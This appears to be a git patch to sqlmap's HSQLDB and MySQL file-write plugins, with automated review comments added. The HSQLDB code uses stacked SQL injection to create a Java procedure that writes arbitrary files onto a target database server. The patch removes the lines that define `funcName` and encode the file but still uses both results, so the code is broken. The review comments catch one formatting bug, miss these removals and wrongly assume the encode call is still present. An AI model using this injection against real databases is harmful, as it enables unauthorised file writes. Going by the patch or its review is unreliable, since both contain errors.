From 0585a55ee035f124bfdb557d22a02472d6d83c41 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2020 11:05:13 +0200 Subject: [PATCH] Trivial refactoring for #4379 --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 22 +++++++++------------- plugins/dbms/mysql/filesystem.py | 2 +- 3 files changed, 11 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3fba3a549..efe598298 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -18,7 +18,7 @@ from lib.core.enums import OS from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.4.10.4" +VERSION = "1.4.10.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index 1f72a0c6e..05161deb5 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py 
@@ -21,26 +21,23 @@ class Filesystem(GenericFilesystem): @stackedmethod def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): - funcName = randomStr() - MAX_BYTES = 2 ** 20 + max_bytes = 1024 * 1024 - debugMsg = "creating a Java Language Procedure '%s'" % funcName + debugMsg = "creating JLP procedure '%s'" % funcName logger.debug(debugMsg) - addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES) + addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes) addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL " addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'" inject.goStacked(addFuncQuery) - logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedStr = fcEncodedList[0][2:] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" 
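Review bot: Nothing in this hunk compares the encoded file length with `max_bytes`, so a local file above 1 MiB still reaches the `VARBINARY(%s)` cast and the only length check is the 8000-character GET warning. Assuming `fcEncodedStr` holds two hex characters per byte, a guard such as `if fcEncodedStrLen // 2 > max_bytes:` that warns and returns would catch this. Placing it before `inject.goStacked(addFuncQuery)` means moving the `fileEncode` call up, and it avoids creating a routine on the tested database for a write that may be truncated or rejected. On style, the new local `max_bytes` is snake_case while the rest of the method uses camelCase (`funcName`, `fcEncodedStr`), so `maxBytes` would match. The body of `stackedWriteFile` continues past the end of this hunk.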
@@ -49,15 +46,14 @@ class Filesystem(GenericFilesystem): debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) - # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures - invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES) + # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures + invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes) inject.goStacked(invokeQuery) - logger.debug("removing procedure %s from DB" % funcName) - delQuery = "DELETE PROCEDURE " + funcName + logger.debug("cleaning up" % funcName) + delQuery = "DELETE PROCEDURE %s" % funcName inject.goStacked(delQuery) - message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile + message = "the local file '%s' has been written on the back-end DBMS" % localFile message += "file system ('%s')" % remoteFile logger.info(message) - diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index f92485a2c..5cbe946be 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -96,7 +96,7 @@ class Filesystem(GenericFilesystem): fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process"
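Review bot: The new line `logger.debug("cleaning up" % funcName)` in the hsqldb hunk raises `TypeError: not all arguments converted during string formatting`, because the format string has no `%s` for its argument. The exception fires after the file has been written and before `inject.goStacked(delQuery)` runs, so the procedure created earlier is never removed from the tested database; `logger.debug("cleaning up procedure '%s'" % funcName)` fixes it. Two things carried over from the old side are worth fixing in the same place. HSQLDB removes routines with `DROP PROCEDURE`, so `"DELETE PROCEDURE %s"` probably does not remove anything (worth confirming against the HSQLDB guide referenced in the comment), and the final message joins `"...back-end DBMS"` and `"file system ('%s')"` without a space between them. The method starts before this hunk.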